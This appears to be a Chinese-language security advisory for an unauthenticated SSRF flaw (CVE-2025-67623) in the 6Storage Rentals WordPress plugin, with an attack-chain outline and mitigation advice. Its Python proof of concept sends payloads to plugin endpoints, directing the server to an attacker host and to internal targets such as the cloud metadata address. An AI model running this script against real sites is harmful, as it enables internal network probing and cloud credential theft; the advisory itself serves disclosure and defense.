CVE-2025-67623: 6Storage Rentals插件服务端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-67623

漏洞类型

服务端请求伪造(SSRF)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

6Storage 6Storage Rentals (6storage-rentals WordPress插件)

漏洞概述

CVE-2025-67623是WordPress 6Storage Rentals插件中存在的一个服务端请求伪造（SSRF）漏洞。该漏洞存在于插件的2.19.9版本（根据Patchstack数据库记录），影响插件从未知版本到2.22.0的所有版本。SSRF是一种网络安全漏洞，攻击者可以通过存在缺陷的Web应用程序向外部或内部服务器发起请求，从而绕过防火墙限制或访问本不应该被直接访问的资源。攻击者可以利用此漏洞向内部网络服务发起请求，探测内网环境，读取本地文件，或对内部服务进行攻击。由于该漏洞无需认证即可利用，且无需用户交互，因此具有较高的利用潜力。虽然CVSS评分为5.4（中危），但在特定场景下，如内网环境或与其他漏洞组合利用时，可能造成更严重的安全威胁。建议使用该插件的用户立即检查并采取相应的安全措施。

技术细节

该SSRF漏洞源于6Storage Rentals插件对用户输入的URL参数缺乏充分的验证和过滤。攻击者可以通过构造恶意的URL请求，诱使服务器向攻击者指定的任意地址发起请求。漏洞主要存在于插件处理外部资源请求的功能模块中，攻击者可以通过修改请求参数中的URL值来实现对内部系统的探测。例如，攻击者可以将URL指向内部IP地址（如192.168.x.x、10.x.x.x）、本地文件协议（file://）、云元数据端点（如AWS 169.254.169.254）或内网服务端口。插件在处理请求时未对目标地址进行严格的域名/IP白名单限制或协议验证，导致攻击者可以利用服务器作为代理来执行恶意请求。这种攻击方式可以绕过网络边界防护，直接对内网系统进行探测和攻击，甚至可能泄露敏感信息或导致远程代码执行。

攻击链分析

STEP 1

1

信息收集：攻击者识别目标网站使用的6Storage Rentals插件版本

STEP 2

2

构造恶意请求：攻击者构造包含恶意URL参数的SSRF payload

STEP 3

3

发送请求：攻击者向存在漏洞的插件端点（如admin-ajax.php）发送特制请求

STEP 4

4

服务端请求：目标服务器在处理请求时向攻击者指定的URL发起请求

STEP 5

5

内网探测或数据窃取：利用SSRF探测内网服务、访问云元数据或读取敏感资源

STEP 6

6

持久化或进一步利用：结合其他漏洞或凭据进行更深层次的攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-67623 - 6Storage Rentals SSRF PoC
Note: This PoC is for educational and authorized testing purposes only.
"""

import requests
import sys

def test_ssrf(target_url, attacker_server):
    """
    Test for SSRF vulnerability in 6Storage Rentals plugin
    """
    # Common WordPress plugin endpoint patterns
    endpoints = [
        '/wp-admin/admin-ajax.php',
        '/wp-json/6storage/v1/',
        '/?rest_route=/6storage/v1/'
    ]
    
    # SSRF payload - attempt to make the server request our controlled endpoint
    ssrf_payload = {
        'action': '6storage_fetch_data',
        'url': attacker_server,
        'endpoint': 'test'
    }
    
    print(f"[*] Testing SSRF on: {target_url}")
    print(f"[*] Attacker-controlled server: {attacker_server}")
    
    for endpoint in endpoints:
        full_url = target_url.rstrip('/') + endpoint
        try:
            response = requests.post(
                full_url,
                data=ssrf_payload,
                timeout=10,
                verify=False
            )
            print(f"[+] Tested endpoint: {endpoint}")
            print(f"    Status: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[-] Failed to reach {endpoint}: {e}")
    
    # Internal network probing payload
    internal_targets = [
        'http://127.0.0.1/',
        'http://169.254.169.254/latest/meta-data/',
        'http://localhost/admin/'
    ]
    
    print("\n[*] Testing internal network access...")
    for target in internal_targets:
        ssrf_payload['url'] = target
        try:
            response = requests.post(
                target_url + endpoints[0],
                data=ssrf_payload,
                timeout=5,
                verify=False
            )
            print(f"[+] Target: {target} - Status: {response.status_code}")
        except:
            pass

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_url> <attacker_server>")
        print(f"Example: {sys.argv[0]} http://example.com http://attacker.com:8080")
        sys.exit(1)
    test_ssrf(sys.argv[1], sys.argv[2])

影响范围

6Storage Rentals (6storage-rentals) WordPress插件 <= 2.22.0

已知受影响版本：2.19.9

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 使用Web应用防火墙（WAF）规则阻止包含内网IP、localhost、云元数据端点等可疑URL的请求；2) 通过.htaccess或Nginx配置限制服务器对外发起请求的范围；3) 禁用或限制admin-ajax.php等可能触发SSRF的端点访问权限；4) 实施IP黑名单机制阻止已知的恶意请求来源；5) 监控服务器日志，关注异常的外部请求模式；6) 考虑暂时禁用6Storage Rentals插件，直至官方发布安全修复版本。